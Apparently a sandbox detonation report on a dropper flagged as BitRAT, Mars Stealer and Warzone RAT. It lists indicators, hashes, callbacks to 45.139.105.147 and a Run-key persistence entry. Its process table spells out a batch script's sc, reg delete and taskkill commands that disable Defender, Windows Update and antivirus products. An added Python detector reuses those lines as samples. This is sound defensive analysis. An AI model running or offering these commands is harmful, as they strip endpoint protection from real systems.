| File opened for modification | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MSASCui.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpAsDesc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\installerX32.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpCmdRun.exe | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpEvMsg.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Program Files\__tmp_rar_sfx_access_check_7080183 | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File created | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpAsDesc.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpOAV.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\MpRTP.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft office.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Builded.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File created | C:\Program Files\InstallerX64.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft.exe | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\MpClient.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui | C:\Windows\system32\cmd.exe | N/A |
Launches sc.exe
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Microsoft office.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft office.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | "C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe" |
| C:\Program Files\Microsoft.exe | "C:\Program Files\Microsoft.exe" |
| C:\Program Files\Builded.exe | "C:\Program Files\Builded.exe" |
| C:\Program Files\installerX32.exe | "C:\Program Files\installerX32.exe" |
| C:\Program Files\InstallerX64.exe | "C:\Program Files\InstallerX64.exe" |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\ADA.tmp\ADB.tmp\ADC.bat "C:\Program Files\installerX32.exe"" |
| C:\Program Files\Microsoft office.exe | "C:\Program Files\Microsoft office.exe" |
| C:\Windows\system32\sc.exe | sc config windefend start= disabled |
| C:\Windows\system32\sc.exe | sc stop windefend |
| C:\Windows\system32\sc.exe | sc delete windefend |
| C:\Windows\system32\sc.exe | sc stop WdNisSvc |
| C:\Windows\system32\sc.exe | sc config WdNisSvc start= disabled |
| C:\Windows\system32\sc.exe | sc delete WdNisSvc |
| C:\Windows\system32\sc.exe | sc stop Sense |
| C:\Windows\system32\sc.exe | sc config Sense start= disabled |
| C:\Windows\system32\sc.exe | sc delete Sense |
| C:\Windows\system32\sc.exe | sc stop wuauserv |
| C:\Windows\system32\sc.exe | sc config wuauserv start= disabled |
| C:\Windows\system32\sc.exe | sc stop usosvc |
| C:\Windows\system32\sc.exe | sc config usosvc start= disabled |
| C:\Windows\system32\sc.exe | sc stop WaasMedicSvc |
| C:\Windows\system32\sc.exe | sc config WaasMedicSvc start= disabled |
| C:\Windows\system32\sc.exe | sc stop SecurityHealthService |
| C:\Windows\system32\sc.exe | sc config SecurityHealthService start= disabled |
| C:\Windows\system32\sc.exe | sc delete SecurityHealthService |
| C:\Windows\system32\sc.exe | sc stop SDRSVC |
| C:\Windows\system32\sc.exe | sc config SDRSVC start= disabled |
| C:\Windows\system32\sc.exe | sc stop wscsvc |
| C:\Windows\system32\sc.exe | sc config wscsvc start= disabled |
| C:\Windows\system32\sc.exe | sc stop WdiServiceHost |
| C:\Windows\system32\sc.exe | sc config WdiServiceHost start= disabled |
| C:\Windows\system32\sc.exe | sc stop WdiSystemHost |
| C:\Windows\system32\sc.exe | sc config WdiSystemHost start= disabled |
| C:\Windows\system32\sc.exe | sc stop InstallService |
| C:\Windows\system32\sc.exe | sc config InstallService Start= disabled |
| C:\Windows\system32\sc.exe | sc stop VaultSvc |
| C:\Windows\system32\sc.exe | sc config VaultSvc start= disabled |
| C:\Windows\system32\sc.exe | sc stop Spooler |
| C:\Windows\System32\rundll32.exe | C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding |
| C:\Windows\system32\sc.exe | sc config Spooler start= disabled |
| C:\Windows\system32\sc.exe | sc stop LicenseManager |
| C:\Windows\system32\sc.exe | sc config LicenseManager start= disabled |
| C:\Windows\system32\sc.exe | sc stop DiagTrack |
| C:\Windows\system32\sc.exe | sc config DiagTrack start= disabled |
| C:\Windows\system32\taskkill.exe | taskkill /f /im smartscreen.exe |
| C:\Windows\system32\taskkill.exe | taskkill /f /im SecurityHealthService.exe |
| C:\Windows\system32\taskkill.exe | taskkill /f /im MpCopyAccelerator.exe |
| C:\Windows\system32\taskkill.exe | taskkill /f /im MpCopyAccelerator.exe |
| C:\Windows\System32\taskkill.exe | taskkill /f /im SecurityHealthService.exe |
| C:\Windows\system32\taskkill.exe | taskkill /f /im SystemSettings.exe |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Security Health" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdBoot" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisDrv" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdNisSvc" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wscsvc" /f |
| C:\Windows\SysWOW64\reg.exe | reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f |
| C:\Windows\SysWOW64\sc.exe | sc delete windefend |
| C:\Windows\SysWOW64\sc.exe | sc delete sense |
| C:\Windows\SysWOW64\sc.exe | sc stop nsWscSvc |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im MBAMWsc.exe |
| C:\Windows\SysWOW64\sc.exe | sc stop MBAMService |
| C:\Windows\SysWOW64\sc.exe | sc config MBAMService start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc delete MBAMService |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im MBAM.exe |
| C:\Windows\SysWOW64\sc.exe | sc stop Bytefenceservice |
| C:\Windows\SysWOW64\sc.exe | sc config Bytefenceservice start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc delete Bytefenceservice |
| C:\Windows\SysWOW64\taskkill.exe | taskkill /f /im Bytefence.exe |
| C:\Windows\system32\sc.exe | sc stop "avast! Tools" |
| C:\Windows\system32\sc.exe | sc config "avast! Tools" start= disabled |
| C:\Windows\system32\sc.exe | sc delete "avast! Tools" |
| C:\Windows\system32\sc.exe | sc stop "avast! Antivirus" |
| C:\Windows\system32\sc.exe | sc config "avast! Antivirus" start= disabled |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" |
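The sc.exe, reg.exe and taskkill.exe lines above are one batch script (ADC.bat, run by cmd.exe with installerX32.exe as its argument) walking through stop, start= disabled and delete for each service, then deleting Defender's registry trees and driver entries and killing its user-mode helpers; the same sequence is repeated from SysWOW64 for Malwarebytes, ByteFence and Avast. On a current Windows 10/11 build with Tamper Protection enabled, sc stop and sc delete against WinDefend are refused, so the update-service disabling, registry deletions and taskkill calls are the parts of this script most likely to still leave traces there. The detector below is an added example, not part of the sandbox report or its signature engine: it tokenises cmd.exe-style command lines (no backslash escapes, quoted service names such as "avast! Tools") and classifies service, registry and process tampering under ATT&CK T1562.001. The service, process and registry name sets are assumptions assembled from the report's own command lines plus well-known Defender component names; SAMPLE_COMMANDS repeats lines from the report and adds three constructed benign ones.

```python
"""Flag Windows command lines that impair defences (ATT&CK T1562.001).

Added example, not part of the sandbox report.  The name sets below are
assumptions drawn from the report's command lines and well-known Defender
components; SAMPLE_COMMANDS mixes report lines with constructed benign ones.
"""
import re
from dataclasses import dataclass

# Services whose stop/disable/delete is a direct attack on endpoint protection.
SECURITY_SERVICES = {
    "windefend", "wdnissvc", "sense", "securityhealthservice", "wscsvc",
    "nswscsvc", "mbamservice", "bytefenceservice",
    "avast! antivirus", "avast! tools",
}
# Update / servicing pipeline: disabling it stops signature and platform
# updates from ever arriving.  Reported at lower severity.
UPDATE_SERVICES = {"wuauserv", "usosvc", "waasmedicsvc", "installservice"}

# Image names that taskkill should never legitimately target.
SECURITY_PROCESSES = {
    "smartscreen.exe", "securityhealthservice.exe", "mpcopyaccelerator.exe",
    "msmpeng.exe", "mbam.exe", "mbamwsc.exe", "bytefence.exe",
}

# Registry paths (key plus optional value name) tied to Defender, Security
# Center and the Defender driver/service entries.
DEFENDER_KEY_RE = re.compile(
    r"\\(windows defender|security center|windows security health|"
    r"windows advanced threat protection|securityhealth|"
    r"services\\(wdboot|wdfilter|wdnisdrv|wdnissvc|windefend|wscsvc))",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    technique: str
    severity: str
    target: str
    command: str


def tokenize(cmd: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes.
    cmd.exe has no backslash escapes, so shlex would mangle the paths."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmd)]


def classify(cmd: str):
    """Return a Finding for a defence-impairing command line, else None."""
    toks = tokenize(cmd)
    if not toks:
        return None
    exe = toks[0].rsplit("\\", 1)[-1].lower().removesuffix(".exe")
    args = toks[1:]
    low = [a.lower() for a in args]

    if exe == "sc" and len(args) >= 2:
        verb, service = low[0], low[1]
        if verb == "config":
            # Only "start= disabled" (note sc's mandatory space) is tampering.
            if low[2:] != ["start=", "disabled"]:
                return None
            action = "disable"
        elif verb in ("stop", "delete"):
            action = verb
        else:
            return None
        if service in SECURITY_SERVICES:
            severity = "high"
        elif service in UPDATE_SERVICES:
            severity = "medium"
        else:
            return None
        return Finding("T1562.001", severity, f"service:{service} ({action})", cmd)

    if exe == "reg" and len(args) >= 2 and low[0] == "delete":
        target = args[1]
        if "/v" in low and low.index("/v") + 1 < len(args):
            target += "\\" + args[low.index("/v") + 1]   # include the value name
        if DEFENDER_KEY_RE.search(target):
            return Finding("T1562.001", "high", f"registry:{target}", cmd)
        return None

    if exe == "taskkill" and "/im" in low and low.index("/im") + 1 < len(low):
        image = low[low.index("/im") + 1]
        if image in SECURITY_PROCESSES:
            return Finding("T1562.001", "high", f"process:{image}", cmd)
    return None


def scan(commands):
    """Classify every command line and keep only the findings."""
    return [f for f in map(classify, commands) if f is not None]


def severity_counts(findings):
    counts = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


# Command lines copied from the report, plus three constructed benign ones.
SAMPLE_COMMANDS = [
    "sc config windefend start= disabled",
    "sc stop windefend",
    "sc delete windefend",
    "sc stop Sense",
    "sc config wuauserv start= disabled",
    "sc config InstallService Start= disabled",
    "sc stop Spooler",
    'sc config "avast! Antivirus" start= disabled',
    "taskkill /f /im smartscreen.exe",
    "taskkill /f /im SystemSettings.exe",
    r'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender" /f',
    r'reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter" /f',
    r'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v SecurityHealth /f',
    "sc query windefend",                                            # constructed: benign
    "taskkill /f /im notepad.exe",                                   # constructed: benign
    r'reg delete "HKEY_CURRENT_USER\SOFTWARE\Contoso\Widget" /f',    # constructed: benign
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_COMMANDS):
        print(f"[{finding.severity:6}] {finding.target:50} <- {finding.command}")
    print(severity_counts(scan(SAMPLE_COMMANDS)))
```

Run over the report's lines the classifier yields nine high and two medium findings and stays silent on Spooler, SystemSettings.exe and the benign lines; in an EDR pipeline the signal worth alerting on is the burst of distinct services hit by the same parent within seconds rather than any single line, which is a grouping step on top of `classify`.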
Network
| Country | Destination | Domain | Proto |
| N/A | 45.139.105.147:1234 | N/A | tcp |
| N/A | 8.8.8.8:53 | data.topababa.com | udp |
| N/A | 45.139.105.147:5200 | N/A | tcp |
Files
memory/1996-54-0x00000000752B1000-0x00000000752B3000-memory.dmp
\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
memory/576-59-0x0000000000000000-mapping.dmp
C:\Program Files\Microsoft.exe
| MD5 | 5cf52aea15ebdef8a216f5a3d4f44c73 |
| SHA1 | b7394c7347b84db2d878e9deb260862d51023dd4 |
| SHA256 | 479602f23ad386779cd1329f35f27b7ea9bdc4aab103b07c8c78ed842827a078 |
| SHA512 | 230112cc5fad35c11b70d610c93ac97e5c7a74c7f205b3b23faeb08efd679c8dd2969dc464272f3acdd10d6a32aa25e20e2e136550cfe399afbbb1d0928ffe4b |
\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
memory/584-66-0x0000000000000000-mapping.dmp
C:\Program Files\Builded.exe
| MD5 | 361356a7a0a38b3080b298ff8f3b8c9d |
| SHA1 | 1763fa71f4cd842a84600b47ee9b436c417f5c1f |
| SHA256 | b1451f3376795964f26f5fe9f142b94b82bd9a39a371182e9bb425ed3c4bd84a |
| SHA512 | 0e42d604d15ee4e6c150659f19dc26bcd5c09ef09d21562d4b491ec0038563d342bbfa456978d62913549bb769255295764b406500ed1888b33fdc08f68fd9f8 |
\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
memory/608-71-0x0000000000000000-mapping.dmp
C:\Program Files\installerX32.exe
| MD5 | c27bdf2ff2a21ec02ed912e7fac3477c |
| SHA1 | 5ad38698e859a7853f7bab46c02efd03144fef36 |
| SHA256 | 3de84b141dd53e7550330c170ff77740ee3ae763cba82a07b8d0e6e1dfd5f51c |
| SHA512 | 1d850f735225fcff71198a6360b813563652a75fb0eb458ad1e071c10efb9c3de80505334e75c665827601bd5d19bcf711cb0d6e365d1b8bd7bf7dec26c5a8d1 |
\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
memory/1640-77-0x0000000000000000-mapping.dmp
memory/872-78-0x0000000000000000-mapping.dmp
C:\Program Files\InstallerX64.exe
| MD5 | cc3db2432720f58955baa76ab4708a18 |
| SHA1 | 256923ae3d9888262be5c548b553182c4400674a |
| SHA256 | 023d81989c14732ab8e08049ca6ad6704def8c3b6635bc5afeb5316c01870096 |
| SHA512 | ec369f80889c4411a3fcd07b8ed10bfbc5283ea6a2e7ae82022da63a4a70f2ee96f8f05b8f6d3e7bdddfebaf30086cc2e4ec04233c72046eba7ed082ee78ab82 |
\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
C:\Users\Admin\AppData\Local\Temp\ADA.tmp\ADB.tmp\ADC.bat
| MD5 | 3c92f725b696f48b1ae5386c6b88147d |
| SHA1 | 7d80fab21ff225acdefbe3c33e11d57dbd58244b |
| SHA256 | 50b7883ad90bcf0b20671b7f0de20d11e4dd88aa2d17cc36b0b0171ca9e800d2 |
| SHA512 | ceedc8835db458884cd49918981965610e2804e0dc42d2ae6eb3aa4c5c281b684978fa73a934faf513184a40fd6b8db8909e90ad86ee152cb63990a87f9c5d03 |
memory/2016-87-0x0000000000000000-mapping.dmp
memory/1352-90-0x0000000000000000-mapping.dmp
memory/2016-89-0x0000000000400000-0x00000000007CE000-memory.dmp
C:\Program Files\Microsoft office.exe
| MD5 | 2bc19dd96b42cea3280eb5fe1e949b82 |
| SHA1 | d4daeaa890659239a848d36b34e1c5b0d150c42f |
| SHA256 | 6d654b2b1830638ac56fc0801f5898e61c05c6237d007e7b4d326930e38fa205 |
| SHA512 | e57a71956cab498c6d6bd4af448a3360ea13b749900d1e656904dfb5a7edb19f236a19bf72282bdc750f8bfb0148734083e6877afd4ad95c27616d207458dd1b |
memory/1656-86-0x0000000000000000-mapping.dmp
memory/1508-92-0x0000000000000000-mapping.dmp
memory/584-93-0x0000000000400000-0x000000000043D000-memory.dmp
memory/828-94-0x0000000000000000-mapping.dmp
memory/1948-95-0x0000000000000000-mapping.dmp
memory/776-96-0x0000000000000000-mapping.dmp
memory/1172-97-0x0000000000000000-mapping.dmp
memory/928-98-0x0000000000000000-mapping.dmp
memory/1688-99-0x0000000000000000-mapping.dmp
memory/972-100-0x0000000000000000-mapping.dmp
memory/996-101-0x0000000000000000-mapping.dmp
memory/1988-102-0x0000000000000000-mapping.dmp
memory/1776-103-0x0000000000000000-mapping.dmp
memory/1084-104-0x0000000000000000-mapping.dmp
memory/848-105-0x0000000000000000-mapping.dmp
memory/1752-106-0x0000000000000000-mapping.dmp
memory/1204-107-0x0000000000000000-mapping.dmp
memory/1728-108-0x0000000000000000-mapping.dmp
memory/1740-109-0x0000000000000000-mapping.dmp
memory/948-110-0x0000000000000000-mapping.dmp
memory/1636-111-0x0000000000000000-mapping.dmp
memory/1676-112-0x0000000000000000-mapping.dmp
memory/1956-113-0x0000000000000000-mapping.dmp
memory/568-114-0x0000000000000000-mapping.dmp
memory/564-115-0x0000000000000000-mapping.dmp
memory/772-116-0x0000000000000000-mapping.dmp
memory/1412-117-0x0000000000000000-mapping.dmp
memory/1900-118-0x0000000000000000-mapping.dmp
memory/1540-119-0x0000000000000000-mapping.dmp
memory/340-120-0x0000000000000000-mapping.dmp
memory/1708-121-0x0000000000000000-mapping.dmp
memory/108-122-0x0000000000000000-mapping.dmp
memory/1508-123-0x0000000000000000-mapping.dmp
memory/1004-124-0x0000000000000000-mapping.dmp
memory/1948-125-0x0000000000000000-mapping.dmp
memory/1108-126-0x0000000000000000-mapping.dmp
memory/1172-127-0x0000000000000000-mapping.dmp
memory/1336-128-0x0000000000000000-mapping.dmp
memory/1744-129-0x0000000000000000-mapping.dmp
memory/948-131-0x0000000000000000-mapping.dmp
memory/1676-132-0x0000000000000000-mapping.dmp
memory/568-133-0x0000000000000000-mapping.dmp
memory/772-134-0x0000000000000000-mapping.dmp
memory/1820-135-0x0000000000000000-mapping.dmp
memory/1784-136-0x0000000000000000-mapping.dmp
memory/1528-137-0x0000000000000000-mapping.dmp
memory/1540-138-0x0000000000000000-mapping.dmp
memory/704-139-0x0000000000000000-mapping.dmp
memory/1992-140-0x0000000000000000-mapping.dmp
memory/1836-141-0x0000000000000000-mapping.dmp
memory/1572-142-0x0000000000000000-mapping.dmp
memory/1932-143-0x0000000000000000-mapping.dmp
memory/1032-144-0x0000000000000000-mapping.dmp
memory/1240-145-0x0000000000000000-mapping.dmp
memory/1280-146-0x0000000000000000-mapping.dmp
memory/536-147-0x0000000000000000-mapping.dmp
memory/1148-148-0x0000000000000000-mapping.dmp
memory/828-149-0x0000000000000000-mapping.dmp
memory/1280-152-0x0000000000260000-0x0000000000261000-memory.dmp
memory/584-153-0x0000000000400000-0x000000000043D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-01-03 19:42
Reported
2023-01-03 19:47
Platform
win10v2004-20220812-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
BitRAT
Mars Stealer
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security | C:\Windows\system32\reg.exe | N/A |
WarzoneRat, AveMaria
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Installerx64\Installerx32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Program Files\InstallerX64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | C:\Program Files\installerX32.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost\ue800" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost舀" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost" | C:\Program Files\Microsoft office.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\temp\\svchost伀" | C:\Program Files\Microsoft office.exe | N/A |
